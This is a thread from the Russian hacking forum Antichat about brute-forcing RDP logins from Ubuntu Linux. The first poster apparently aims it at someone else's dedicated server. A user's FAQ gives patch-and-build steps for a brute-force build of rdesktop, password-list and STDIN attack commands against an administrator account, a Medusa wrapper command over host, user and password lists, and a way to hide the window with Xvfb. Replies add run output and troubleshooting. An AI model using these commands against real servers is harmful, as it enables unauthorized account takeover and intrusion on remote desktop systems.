Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Soft - *nix (https://forum.antichat.xyz/forumdisplay.php?f=48)
-   -   RDP brut под ubuntu 9.10 (https://forum.antichat.xyz/showthread.php?t=175167)

iSlava 31.01.2010 23:59
RDP brut под ubuntu 9.10
 
долго искал брут rdp под линух, нашел вот патчик к rdesktop
www.hacktoolrepository.com
ставлю по написанному, говорит что пропатчилось удачно,
а при запуске
rdesktop -u administrator -p passwords.txt ipdedik
получаю такую туфту (наверное берет первый пароль из пасслиста, он оказывается неверным)
http://s004.radikal.ru/i208/1001/82/42e4db97a6dft.jpg
после жмакания [OK] предлагается продолжать ручками.
Прошу вашей помощи в решении сией проблемы.
Если знаете чем еще можно побрутить, буду рад узнать

Rubaka 09.02.2010 01:20
та я тож парился помню с rdesktopom!хз чо ему нады!попрбуй из под вайна запустить виндовый брутер! это походу rdesktop не понимает шо ему ответили

LBEST. 10.02.2010 21:53
Оо рпд окно:)
//как настроил в лс пж:).

iSlava 20.02.2010 20:02
Проблему решил давно, решил написать сюда маленький faq по установке и использованию

1. Удалите действующий rdekstop
sudo apt-get remove rdekstop
2. Скачайте rdesktop версии 1.5 с www.rdesktop.org
3. Скачайте патч http://www.foofus.net/jmk/rdesktop.html

Патчим rdesktop

cd rdesktop1.50/
patch -p1 -i rdp-brute-force-r805.diff
./configure
make
make install


Использование


Brute-force атака с использованием пасслиста:
Код:
rdesktop -u administrator -p passwords.txt 192.168.0.100
Brute-force атака посылая пароли через STDIN:
Код:
rdesktop -u administrator -p - 192.168.0.100
Следующий пример - способ использования rdesktop c обёрткой модуля MEDUSA

Код:
medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m ARGS:"-u %U -p - %H" -H hosts.txt -U users.txt -P passwords.txt
Возможный метод для скрытия графического вывода rdeesktop
Код:
% Xvfb :97 -ac -nolisten tcp &
% export DISPLAY=:97

shellz[21h] 20.02.2010 22:11
в чем трабла, делаю значит так:
файл host:
Цитата:
192.168.118.128
файл users:
Цитата:
shellz
файл passwd
Цитата:
32187
83912
1236589
12345678
Запускаю:
Цитата:
$ medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m ARGS:"-u %U -p - %H" -H host -U users -P passwd
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ERROR: Child process failed to execute file: rdesktop
ACCOUNT CHECK: [wrapper] Host: 192.168.118.128 (1 of 1, 0 complete) User: shellz (1 of 1, 0 complete) Password: 32187 (1 of 1 complete)
ACCOUNT FOUND: [wrapper] Host: 192.168.118.128 User: shellz Password: 32187 [ERROR]

iSlava 21.02.2010 00:03
бред, но всё таки попробуй выполнить из папки с rdesktop'ом.
тут почитай http://www.foofus.net/jmk/medusa/medusa-wrapper.html
попробуй пересобрать
Код:
skvoz@x> cd rdesktop/
skvoz@x> ./bootstrap
skvoz@x> ./configure
skvoz@x> make

zah_al 23.05.2010 12:11
блин, сделал всё по вашему faq и чёта один фиг, только 1-й пароль принимает и всё. Чё сделать то можно?


Время: 19:05